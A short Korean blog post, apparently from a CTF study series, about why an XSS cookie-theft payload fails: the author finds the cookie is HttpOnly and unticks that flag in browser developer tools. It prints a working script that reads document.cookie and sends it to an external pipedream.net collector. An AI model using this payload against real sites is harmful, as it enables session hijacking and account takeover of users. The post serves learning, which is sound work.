document.cookie 안됨

CHIKA·2024년 6월 22일
<script>
var cookieData =document.cookie;
var i =new Image();
i.src = "https://engh0by432948.x.pipedream.net/?cookie=" + cookieData; 
</script>

를 XSS취약점이 예상되는 곳에 넣었더니

쿠키가 전송되지 않고 있다.

그렇다면 일단 쿠키가 출력되는지 확인해보자.

<script>
var cookieData = document.Cookie;
alert(document.cookie);
</script>


쿠키가 출력되지 않는다.

쿠키를 확인해보자
개발자도구 > application > Storage > Cookies 에서 사이트 클릭

httpOnly가 설정되어 있다.

httpOnly칸 가운데를 두 번 클릭하면


여기서 한 번 더 클릭해주면 된다.

새로고침 하면

쿠키가 정상적으로 출력된다.

참고자료
https://velog.io/@eeeve/HttpOnly%EC%99%80-Secure-Cookie

profile
CHIKA
이전 포스트

[CTF] SQL Injection Point 4

다음 포스트

[XSS] XSS(Cross Site Scripting)

0개의 댓글